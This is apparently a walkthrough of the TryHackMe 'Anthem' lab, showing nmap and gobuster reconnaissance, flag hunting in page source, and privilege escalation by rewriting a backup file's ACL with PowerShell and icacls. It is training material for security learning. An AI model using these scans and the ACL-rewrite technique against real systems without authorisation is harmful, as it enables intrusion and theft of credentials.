In this walkthrough, we will be going through the Anthem room from TryHackMe. This room is rated Easy on the platform and consists of exploiting a Windows machine using web enumeration, source code review and privilege escalation. So, let’s get started without any delay.
Objective: This task involves you paying attention to details and finding the ‘keys to the castle’.
Task 1 – Website Analysis
Question 1 – Let’s run nmap and check what ports are open.
sudo nmap -Pn -sS -sV 10.10.175.171
Question 2 – What port is for the web server?
Question 3 – What port is for remote desktop service?
Question 4 – What is a possible password in one of the pages web crawlers check for?
Question 5 – What CMS is the website using?
wh1terose@fsociety:~$ gobuster dir -u http://10.10.175.171/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.175.171/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/19 23:13:13 Starting gobuster in directory enumeration mode
===============================================================
/Archive              (Status: 301) [Size: 118] [--> /]
/Blog                 (Status: 200) [Size: 5399]
/RSS                  (Status: 200) [Size: 1877]
/Search               (Status: 200) [Size: 3472]
/SiteMap              (Status: 200) [Size: 1047]
/archive              (Status: 301) [Size: 123] [--> /blog/]
/authors              (Status: 200) [Size: 4120]
/blog                 (Status: 200) [Size: 5399]
/categories           (Status: 200) [Size: 3546]
/install              (Status: 302) [Size: 126] [--> /umbraco/]
Question 6 – What is the domain of the website?
Question 7 – What’s the name of the Administrator?
- Google the poem in the following post – http://10.10.175.171/archive/a-cheers-to-our-it-department/. It reveals the admin name.
Question 8 – Can we find the email address of the administrator?
- Navigate to the following post, which has an email address in it. The administrator’s address follows the same pattern: the initials of the first and last name at the site’s domain.
Task 2 – Spot the flags
Our beloved admin left some flags behind that we need to gather before we proceed to the next task.
Question 1 – What is flag 1?
- View the source code of “We are hiring” article. There, search for “meta”. You will find your flag.
Question 2 – What is flag 2?
- View the source of the website home page.
Question 3 – What is flag 3?
- Navigate to the following directory, which was revealed in the directory brute-forcing section – http://10.10.175.171/authors
Question 4 – What is flag 4?
- View the source code of “A cheers to our IT department” article. There, search for “meta”. You will find your flag.
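The four flags above are all found by viewing page source and hunting for meta tags. The following is an added example, not code from the original walkthrough or from the room, that does the same hunt programmatically so every discovered page can be checked in one go. It pulls every meta tag and HTML comment out of a page; the sample HTML and its flag value are constructed for the demo, and the live target IP and paths are the ones mentioned in this walkthrough (adjust them to your own instance).

```powershell
# Added example (not part of the original walkthrough): the "view source and
# search for meta" step done programmatically. Assumptions are marked below.

function Get-HiddenHtmlItems {
    # Returns one object per <meta> tag and per HTML comment found in $Html.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Html,
        [string] $Source = '(inline)'
    )

    $found = @()

    # <meta ...> tags: grab the attribute text, then pull name/content out of it.
    foreach ($m in [regex]::Matches($Html, '<meta\s+([^>]*?)\s*/?>', 'IgnoreCase')) {
        $attrs   = $m.Groups[1].Value
        $name    = [regex]::Match($attrs, '\b(?:name|property)\s*=\s*["'']([^"'']*)["'']', 'IgnoreCase').Groups[1].Value
        $content = [regex]::Match($attrs, '\bcontent\s*=\s*["'']([^"'']*)["'']', 'IgnoreCase').Groups[1].Value
        $found += [pscustomobject]@{ Source = $Source; Kind = 'meta'; Name = $name; Value = $content }
    }

    # HTML comments: the other place hidden notes and flags tend to end up.
    foreach ($c in [regex]::Matches($Html, '<!--(.*?)-->', 'Singleline')) {
        $found += [pscustomobject]@{ Source = $Source; Kind = 'comment'; Name = ''; Value = $c.Groups[1].Value.Trim() }
    }

    return $found
}

# Constructed sample page (not the real article); the flag value is made up.
$sampleHtml = @'
<html><head>
<meta charset="utf-8">
<meta name="description" content="Example post" />
<meta name="flag" content="THM{example-not-the-real-flag}">
<!-- note to self: tidy this up before publishing -->
</head><body><p>hello</p></body></html>
'@

Get-HiddenHtmlItems -Html $sampleHtml -Source 'sample' | Format-Table -AutoSize

# Same check against the live box. The IP is the one used in this walkthrough;
# the paths are the ones it mentions (home page, the IT-department post,
# /authors from gobuster, robots.txt). Noise such as viewport/description
# meta tags is filtered out so the unusual entries stand out.
$base  = 'http://10.10.175.171'
$paths = '/', '/archive/a-cheers-to-our-it-department/', '/authors', '/robots.txt'
foreach ($p in $paths) {
    try {
        $resp = Invoke-WebRequest -Uri ($base + $p) -UseBasicParsing -TimeoutSec 5
        Get-HiddenHtmlItems -Html $resp.Content -Source $p |
            Where-Object { $_.Value -and $_.Name -notin 'viewport', 'description' }
    } catch {
        Write-Warning "$p : $($_.Exception.Message)"
    }
}
```

Regex is used rather than a full HTML parser because these pages are small and the tags of interest are simple; for anything more involved, feed the content to a proper parser instead. Feeding the output of the gobuster scan in as $paths extends the sweep to every directory it found.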
Task 3 – Final stage
Let’s get into the box using the intel we gathered.
Question 1 – Let’s figure out the username and password to log in to the box.(The box is not on a domain)
- Use Remmina and the following credentials to RDP into the server.
Question 2 – Gain initial access to the machine, what is the contents of user.txt?
Question 3 – Can we spot the admin password?
- There is a folder named backup at C:\backup. Opening the file restore inside it gives a permission error, so let’s troubleshoot it.
- First, right-click on the file and go to Properties, then select the Security tab. Click Edit, then Add, and look up our username, SG. Click Apply and confirm the changes.
- Opening the file now gives us the admin password.
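The GUI steps above work only because the logged-in account is allowed to change the file’s DACL in the first place. The following is an added example, not the walkthrough author’s or the room’s own code, that performs the same edit from PowerShell and runs the check that explains why it is possible. It assumes the file path is C:\backup\restore (named as in the walkthrough), the RDP user is SG, and the box is not domain-joined (so USERDOMAIN is the computer name); whether SG is the owner of the file or holds an explicit "change permissions" right is checked at runtime rather than assumed.

```powershell
# Added example (not part of the original walkthrough): the command-line
# equivalent of Properties > Security > Edit, plus the check that explains why
# a low-privileged user can change this ACL at all. Assumptions: file path
# C:\backup\restore, RDP user SG, non-domain-joined box.

$file = 'C:\backup\restore'
$me   = "$env:USERDOMAIN\$env:USERNAME"

# 1. Who owns the file, and who is currently allowed what?
$acl = Get-Acl -Path $file
"Owner: $($acl.Owner)"
$acl.Access | Format-Table IdentityReference, FileSystemRights, AccessControlType -AutoSize

# 2. Confirm the symptom from the walkthrough: the read is denied.
try {
    Get-Content -Path $file -ErrorAction Stop | Out-Null
    'Readable already; nothing to fix.'
} catch {
    "Access denied, as expected: $($_.Exception.Message)"
}

# 3. The GUI edit only succeeds because the account holds WRITE_DAC on the
#    file: the owner has it implicitly, and an Allow ACE with Full Control or
#    "Change permissions" grants it explicitly. Only ACEs naming the user
#    directly are checked here; group memberships are not expanded.
$changePerms = [int][System.Security.AccessControl.FileSystemRights]::ChangePermissions
$hasWriteDac = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.IdentityReference.Value -ieq $me -and
    (([int]$_.FileSystemRights -band $changePerms) -ne 0)
}

if ($acl.Owner -ieq $me -or $hasWriteDac) {
    # Grant ourselves read only; icacls edits the DACL and nothing else.
    icacls $file /grant "$($env:USERNAME):(R)"
    Get-Content -Path $file          # should now show the admin password
} else {
    "Neither owner nor WRITE_DAC on $file as $me; this route will not work."
}
```

The defensive lesson is the same one the room is teaching: a file that a regular user owns, or that grants them Full Control, is not protected by a restrictive DACL, because the user can simply rewrite that DACL. Sensitive backups should be owned by an administrative principal with the user holding, at most, read access.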
Question 4 – Escalate your privileges to root, what is the contents of root.txt?
- Use the following credentials to RDP into the server as an admin.
So that was “Anthem” for you. We started off with a regular nmap scan and found two open ports: 80 (HTTP) and 3389 (RDP). Next, we found a potential password in robots.txt. Following that, we ran a gobuster scan to reveal some directories; the results included an /install directory redirecting to /umbraco/, which confirms the Umbraco CMS is running on the system. We got the domain name from the page footer and used Google to figure out the admin’s name and email address. Moving on to the next section, we captured 4 flags hidden in the page source of various parts of the website. At last, we got into the machine over RDP and then escalated privileges by exploiting the permissions on the backup folder, which gave us our user and root flags. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.